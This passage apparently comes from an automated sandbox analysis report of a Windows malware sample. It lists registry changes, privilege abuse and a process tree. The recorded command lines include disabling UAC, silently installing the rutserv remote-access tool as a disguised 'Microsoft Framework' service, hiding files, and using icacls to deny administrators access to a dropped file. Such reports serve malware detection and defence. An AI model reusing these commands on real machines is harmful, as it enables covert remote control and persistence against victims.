190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a RDPWInst.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 RDPWInst.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C winit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 LtHv0O2KZDK4M637.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a RDPWInst.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 RDPWInst.exe Set value (data) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C\Blob = 030000000100000014000000d89e3bd43d5d909b47a18977aa9d5ce36cee184c1400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb040000000100000010000000285ec909c4ab0d2d57f5086b225799aa0f000000010000003000000013baa039635f1c5292a8c2f36aae7e1d25c025202e9092f5b0f53f5f752dfa9c71b3d1b8d9a6358fcee6ec75622fabf9190000000100000010000000ea6089055218053dd01e37e1d806eedf1800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa22000000001000000850500003082058130820469a00302010202103972443af922b751d7d36c10dd313595300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3139303331323030303030305a170d3238313233313233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c05000382010100188751dc74213d9c8ae027b733d02eccecf0e6cb5e11de226f9b758e9e72fee4d6feaa1f9c962def034a7eaef48d6f723c433bc03febb8df5caaa9c6aef2fcd8eea37b43f686367c14e0cdf4f73ffedeb8b48af09196fefd43647efdccd201a17d7df81919c9422b13bf588bbaa4a266047688914e0c8914cea24dc932b3bae8141abc71f15bf0410b98000a220310e50cb1f9cd923719ed3bf1e43ab6f945132675afbbaaef3f7b773bd2c402913d1900d3175c39db3f7b180d45cd9385962f5ddf59164f3f51bdd545183fed4a8ee80661742316b50d50732744477f105d892a6b853114c4e8a96a4c80bc6a78cfb87f8e7672990c9dfed7910816a1a35f95 winit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 LtHv0O2KZDK4M637.exe -
NTFS ADS 2 IoCs
Processes:
taskhostw.exeLtHv0O2KZDK4M637.exedescription ioc process File opened for modification C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2 taskhostw.exe File opened for modification C:\Users\Admin\AppData\Local\Temp\WinMgmts:\ LtHv0O2KZDK4M637.exe -
Runs .reg file with regedit 2 IoCs
Processes:
regedit.exeregedit.exepid process 1060 regedit.exe 1440 regedit.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
LtHv0O2KZDK4M637.exerutserv.exerutserv.exerutserv.exerutserv.exerfusclient.exesys.exewinit.exepid process 804 LtHv0O2KZDK4M637.exe 804 LtHv0O2KZDK4M637.exe 804 LtHv0O2KZDK4M637.exe 804 LtHv0O2KZDK4M637.exe 804 LtHv0O2KZDK4M637.exe 804 LtHv0O2KZDK4M637.exe 804 LtHv0O2KZDK4M637.exe 804 LtHv0O2KZDK4M637.exe 804 LtHv0O2KZDK4M637.exe 804 LtHv0O2KZDK4M637.exe 804 LtHv0O2KZDK4M637.exe 804 LtHv0O2KZDK4M637.exe 804 LtHv0O2KZDK4M637.exe 804 LtHv0O2KZDK4M637.exe 804 LtHv0O2KZDK4M637.exe 804 LtHv0O2KZDK4M637.exe 804 LtHv0O2KZDK4M637.exe 804 LtHv0O2KZDK4M637.exe 804 LtHv0O2KZDK4M637.exe 804 LtHv0O2KZDK4M637.exe 1532 rutserv.exe 1532 rutserv.exe 1532 rutserv.exe 1532 rutserv.exe 1676 rutserv.exe 1676 rutserv.exe 1600 rutserv.exe 1600 rutserv.exe 804 LtHv0O2KZDK4M637.exe 804 LtHv0O2KZDK4M637.exe 804 LtHv0O2KZDK4M637.exe 1988 rutserv.exe 1988 rutserv.exe 1988 rutserv.exe 1988 rutserv.exe 804 LtHv0O2KZDK4M637.exe 804 LtHv0O2KZDK4M637.exe 804 LtHv0O2KZDK4M637.exe 804 LtHv0O2KZDK4M637.exe 804 LtHv0O2KZDK4M637.exe 804 LtHv0O2KZDK4M637.exe 804 LtHv0O2KZDK4M637.exe 804 LtHv0O2KZDK4M637.exe 804 LtHv0O2KZDK4M637.exe 804 LtHv0O2KZDK4M637.exe 276 rfusclient.exe 1060 sys.exe 1468 winit.exe 1468 winit.exe 1468 winit.exe 1468 winit.exe 1468 winit.exe 1468 winit.exe 1468 winit.exe 1468 winit.exe 1468 winit.exe 1468 winit.exe 1468 winit.exe 1468 winit.exe 1468 winit.exe 1468 winit.exe 1468 winit.exe 1468 winit.exe 1468 winit.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
taskhostw.exepid process 1644 taskhostw.exe -
Suspicious behavior: LoadsDriver 5 IoCs
Processes:
pid process 464 928 928 928 928 -
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
rfusclient.exepid process 432 rfusclient.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
rutserv.exerutserv.exerutserv.exeLtHv0O2KZDK4M637.exedescription pid process Token: SeDebugPrivilege 1532 rutserv.exe Token: SeDebugPrivilege 1600 rutserv.exe Token: SeTakeOwnershipPrivilege 1988 rutserv.exe Token: SeTcbPrivilege 1988 rutserv.exe Token: SeTcbPrivilege 1988 rutserv.exe Token: SeDebugPrivilege 804 LtHv0O2KZDK4M637.exe Token: 38607358007114200 804 LtHv0O2KZDK4M637.exe Token: 81688264704 804 LtHv0O2KZDK4M637.exe Token: 4294967296 804 LtHv0O2KZDK4M637.exe Token: 1155801439442405564 804 LtHv0O2KZDK4M637.exe Token: 579340566896675005 804 LtHv0O2KZDK4M637.exe Token: 36029175038699344 804 LtHv0O2KZDK4M637.exe Token: 9920249032592447048 804 LtHv0O2KZDK4M637.exe Token: 30962664049999872 804 LtHv0O2KZDK4M637.exe Token: 9920249032592447048 804 LtHv0O2KZDK4M637.exe Token: 9920249032592447048 804 LtHv0O2KZDK4M637.exe Token: SeShutdownPrivilege 804 LtHv0O2KZDK4M637.exe Token: 9799832789358793752 804 LtHv0O2KZDK4M637.exe Token: 579622010130892825 804 LtHv0O2KZDK4M637.exe Token: 0 804 LtHv0O2KZDK4M637.exe Token: 1374389534720 804 LtHv0O2KZDK4M637.exe Token: 0 804 LtHv0O2KZDK4M637.exe Token: 56 804 LtHv0O2KZDK4M637.exe Token: 4294967296 804 LtHv0O2KZDK4M637.exe Token: 4294967296 804 LtHv0O2KZDK4M637.exe Token: 668812578586632 804 LtHv0O2KZDK4M637.exe Token: 668812578586632 804 LtHv0O2KZDK4M637.exe Token: 668812578586632 804 LtHv0O2KZDK4M637.exe Token: 8589934592 804 LtHv0O2KZDK4M637.exe Token: 1 804 LtHv0O2KZDK4M637.exe Token: 62583312 804 LtHv0O2KZDK4M637.exe Token: 4282145094600 804 LtHv0O2KZDK4M637.exe Token: 579621932821481497 804 LtHv0O2KZDK4M637.exe Token: 0 804 LtHv0O2KZDK4M637.exe Token: 1374389534720 804 LtHv0O2KZDK4M637.exe Token: 47244640256 804 LtHv0O2KZDK4M637.exe Token: 0 804 LtHv0O2KZDK4M637.exe Token: 51539607552 804 LtHv0O2KZDK4M637.exe Token: 40 804 LtHv0O2KZDK4M637.exe Token: 51539607552 804 LtHv0O2KZDK4M637.exe Token: 0 804 LtHv0O2KZDK4M637.exe Token: 8552594747759082286 804 LtHv0O2KZDK4M637.exe Token: 6937813002834471071 804 LtHv0O2KZDK4M637.exe Token: 6937813002834471071 804 LtHv0O2KZDK4M637.exe Token: 6937813002834471071 804 LtHv0O2KZDK4M637.exe Token: 12884901911 804 LtHv0O2KZDK4M637.exe Token: 10578639288 804 LtHv0O2KZDK4M637.exe Token: 17433137212165073604 804 LtHv0O2KZDK4M637.exe Token: 8552215572722580488 804 LtHv0O2KZDK4M637.exe Token: 4058968558 804 LtHv0O2KZDK4M637.exe Token: 51539607552 804 LtHv0O2KZDK4M637.exe Token: 51539607552 804 LtHv0O2KZDK4M637.exe Token: 0 804 LtHv0O2KZDK4M637.exe Token: 281477286448623 804 LtHv0O2KZDK4M637.exe Token: 51539607552 804 LtHv0O2KZDK4M637.exe Token: 0 804 LtHv0O2KZDK4M637.exe Token: 51539607552 804 LtHv0O2KZDK4M637.exe Token: 51539607552 804 LtHv0O2KZDK4M637.exe Token: 0 804 LtHv0O2KZDK4M637.exe Token: 269138078289887232 804 LtHv0O2KZDK4M637.exe Token: 0 804 LtHv0O2KZDK4M637.exe Token: 0 804 LtHv0O2KZDK4M637.exe Token: 0 804 LtHv0O2KZDK4M637.exe Token: 8984585380049518762 804 LtHv0O2KZDK4M637.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
rutserv.exerutserv.exerutserv.exerutserv.exepid process 1532 rutserv.exe 1676 rutserv.exe 1600 rutserv.exe 1988 rutserv.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
LtHv0O2KZDK4M637.exewini.exeWScript.execmd.exerutserv.exedescription pid process target process PID 804 wrote to memory of 524 804 LtHv0O2KZDK4M637.exe wini.exe PID 804 wrote to memory of 524 804 LtHv0O2KZDK4M637.exe wini.exe PID 804 wrote to memory of 524 804 LtHv0O2KZDK4M637.exe wini.exe PID 804 wrote to memory of 524 804 LtHv0O2KZDK4M637.exe wini.exe PID 524 wrote to memory of 1116 524 wini.exe WScript.exe PID 524 wrote to memory of 1116 524 wini.exe WScript.exe PID 524 wrote to memory of 1116 524 wini.exe WScript.exe PID 524 wrote to memory of 1116 524 wini.exe WScript.exe PID 524 wrote to memory of 1468 524 wini.exe winit.exe PID 524 wrote to memory of 1468 524 wini.exe winit.exe PID 524 wrote to memory of 1468 524 wini.exe winit.exe PID 524 wrote to memory of 1468 524 wini.exe winit.exe PID 1116 wrote to memory of 1732 1116 WScript.exe cmd.exe PID 1116 wrote to memory of 1732 1116 WScript.exe cmd.exe PID 1116 wrote to memory of 1732 1116 WScript.exe cmd.exe PID 1116 wrote to memory of 1732 1116 WScript.exe cmd.exe PID 1116 wrote to memory of 1732 1116 WScript.exe cmd.exe PID 1116 wrote to memory of 1732 1116 WScript.exe cmd.exe PID 1116 wrote to memory of 1732 1116 WScript.exe cmd.exe PID 1732 wrote to memory of 1060 1732 cmd.exe regedit.exe PID 1732 wrote to memory of 1060 1732 cmd.exe regedit.exe PID 1732 wrote to memory of 1060 1732 cmd.exe regedit.exe PID 1732 wrote to memory of 1060 1732 cmd.exe regedit.exe PID 1732 wrote to memory of 1440 1732 cmd.exe regedit.exe PID 1732 wrote to memory of 1440 1732 cmd.exe regedit.exe PID 1732 wrote to memory of 1440 1732 cmd.exe regedit.exe PID 1732 wrote to memory of 1440 1732 cmd.exe regedit.exe PID 1732 wrote to memory of 1932 1732 cmd.exe timeout.exe PID 1732 wrote to memory of 1932 1732 cmd.exe timeout.exe PID 1732 wrote to memory of 1932 1732 cmd.exe timeout.exe PID 1732 wrote to memory of 1932 1732 cmd.exe timeout.exe PID 1732 wrote to memory of 1532 1732 cmd.exe rutserv.exe PID 1732 wrote to memory of 1532 1732 cmd.exe rutserv.exe PID 1732 wrote to memory of 1532 1732 cmd.exe rutserv.exe PID 1732 wrote to memory of 1532 1732 cmd.exe rutserv.exe PID 1732 wrote to memory of 1676 1732 cmd.exe rutserv.exe PID 1732 wrote to memory of 1676 1732 cmd.exe rutserv.exe PID 1732 wrote to memory of 1676 1732 cmd.exe rutserv.exe PID 1732 wrote to memory of 1676 1732 cmd.exe rutserv.exe PID 1732 wrote to memory of 1600 1732 cmd.exe rutserv.exe PID 1732 wrote to memory of 1600 1732 cmd.exe rutserv.exe PID 1732 wrote to memory of 1600 1732 cmd.exe rutserv.exe PID 1732 wrote to memory of 1600 1732 cmd.exe rutserv.exe PID 1988 wrote to memory of 276 1988 rutserv.exe rfusclient.exe PID 1988 wrote to memory of 276 1988 rutserv.exe rfusclient.exe PID 1988 wrote to memory of 276 1988 rutserv.exe rfusclient.exe PID 1988 wrote to memory of 276 1988 rutserv.exe rfusclient.exe PID 1988 wrote to memory of 1588 1988 rutserv.exe rfusclient.exe PID 1988 wrote to memory of 1588 1988 rutserv.exe rfusclient.exe PID 1988 wrote to memory of 1588 1988 rutserv.exe rfusclient.exe PID 1988 wrote to memory of 1588 1988 rutserv.exe rfusclient.exe PID 804 wrote to memory of 1060 804 LtHv0O2KZDK4M637.exe sys.exe PID 804 wrote to memory of 1060 804 LtHv0O2KZDK4M637.exe sys.exe PID 804 wrote to memory of 1060 804 LtHv0O2KZDK4M637.exe sys.exe PID 804 wrote to memory of 1060 804 LtHv0O2KZDK4M637.exe sys.exe PID 1732 wrote to memory of 908 1732 cmd.exe attrib.exe PID 1732 wrote to memory of 908 1732 cmd.exe attrib.exe PID 1732 wrote to memory of 908 1732 cmd.exe attrib.exe PID 1732 wrote to memory of 908 1732 cmd.exe attrib.exe PID 1732 wrote to memory of 1300 1732 cmd.exe attrib.exe PID 1732 wrote to memory of 1300 1732 cmd.exe attrib.exe PID 1732 wrote to memory of 1300 1732 cmd.exe attrib.exe PID 1732 wrote to memory of 1300 1732 cmd.exe attrib.exe PID 1732 wrote to memory of 688 1732 cmd.exe sc.exe -
System policy modification 1 TTPs 3 IoCs
Processes:
LtHv0O2KZDK4M637.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" LtHv0O2KZDK4M637.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" LtHv0O2KZDK4M637.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System LtHv0O2KZDK4M637.exe -
Views/modifies file attributes 1 TTPs 31 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exepid process 484 attrib.exe 2436 attrib.exe 2184 attrib.exe 2212 attrib.exe 908 attrib.exe 564 attrib.exe 1092 attrib.exe 1332 attrib.exe 2236 attrib.exe 2740 attrib.exe 2916 attrib.exe 1300 attrib.exe 2500 attrib.exe 2396 attrib.exe 2508 attrib.exe 3044 attrib.exe 2476 attrib.exe 2656 attrib.exe 288 attrib.exe 2772 attrib.exe 3020 attrib.exe 2736 attrib.exe 1940 attrib.exe 2428 attrib.exe 2732 attrib.exe 2544 attrib.exe 2568 attrib.exe 2716 attrib.exe 2840 attrib.exe 2880 attrib.exe 2052 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe"C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe"1⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Adds Run key to start application
- Checks whether UAC is enabled
- Modifies WinLogon
- Modifies system certificate store
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\ProgramData\Microsoft\Intel\wini.exeC:\ProgramData\Microsoft\Intel\wini.exe -pnaxui2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Programdata\Windows\install.bat" "4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg1.reg"5⤵
- Runs .reg file with regedit
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg2.reg"5⤵
- Runs .reg file with regedit
-
C:\Windows\SysWOW64\timeout.exetimeout 25⤵
- Delays execution with timeout.exe
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /silentinstall5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /firewall5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /start5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows\*.*5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\sc.exesc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/10005⤵
-
C:\Windows\SysWOW64\sc.exesc config RManService obj= LocalSystem type= interact type= own5⤵
-
C:\Windows\SysWOW64\sc.exesc config RManService DisplayName= "Microsoft Framework"5⤵
-
C:\ProgramData\Windows\winit.exe"C:\ProgramData\Windows\winit.exe"3⤵
- Executes dropped EXE
- Checks processor information in registry
- Modifies registry class
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Programdata\Install\del.bat4⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 55⤵
- Delays execution with timeout.exe
-
C:\ProgramData\install\sys.exeC:\ProgramData\install\sys.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "sys.exe"3⤵
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\system32\timeout.exe 34⤵
- Delays execution with timeout.exe
-
C:\programdata\install\cheat.exeC:\programdata\install\cheat.exe -pnaxui2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\ProgramData\Microsoft\Intel\taskhost.exe"C:\ProgramData\Microsoft\Intel\taskhost.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Drops file in Windows directory
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- NTFS ADS
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Programdata\WindowsTask\winlogon.exeC:\Programdata\WindowsTask\winlogon.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C schtasks /query /fo list6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /query /fo list7⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /flushdns5⤵
-
C:\Windows\system32\ipconfig.exeipconfig /flushdns6⤵
- Gathers network information
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c gpupdate /force5⤵
-
C:\Windows\system32\gpupdate.exegpupdate /force6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\SysWOW64\drivers\conhost.exe /deny Администраторы:(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\SysWOW64\drivers\conhost.exe /deny System:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny система:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\SysWOW64\drivers\conhost.exe /deny система:(F)5⤵
- Modifies file permissions
-
C:\programdata\microsoft\intel\R8.exeC:\programdata\microsoft\intel\R8.exe4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"5⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\rdp\pause.bat" "6⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout 37⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\chcp.comchcp 12517⤵
-
C:\rdp\Rar.exe"Rar.exe" e -p555 db.rar7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout 27⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"7⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\rdp\bat.bat" "8⤵
- Loads dropped DLL
-
